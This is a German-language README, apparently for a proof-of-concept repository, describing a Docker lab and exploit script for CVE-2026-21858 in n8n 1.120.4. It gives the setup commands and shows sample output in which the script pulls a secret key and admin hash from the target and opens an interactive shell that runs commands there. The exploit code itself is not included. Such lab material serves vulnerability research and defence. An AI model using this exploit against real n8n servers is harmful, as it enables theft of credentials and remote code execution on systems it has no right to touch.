
Docker-basierte PoC-Umgebung und Exploit-Skript für CVE-2026-21858, eine Schwachstelle in n8n 1.120.4, die beliebiges Dateilesen und RCE ermöglicht und Secret-Extraktion sowie eine interaktive Shell bereitstellt.
PoC-Umgebung für n8n 1.120.4 mit einem Form-Trigger-Workflow und einem Exploit-Skript.
Dockerfile — erstellt die verwundbare n8n-Umgebungrun.bat — startet den Container (Windows)workflow.txt — n8n-Workflow (enthält Form Trigger)poc.py — PoC-Skriptrequirements.txt — PoC-Abhängigkeitendocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txt einfügenpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, Admin-Identifikatoren) vom Ziel.n8n-shell>) wird bereitgestellt.id) liefert die Ausgabe aus der Zielumgebung zurück (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Wir veröffentlichen einmal im Monat CVE- und Malware-Analysen. Wenn Sie interessiert sind, folgen Sie bitte den untenstehenden Links, um unsere Publikationen anzusehen.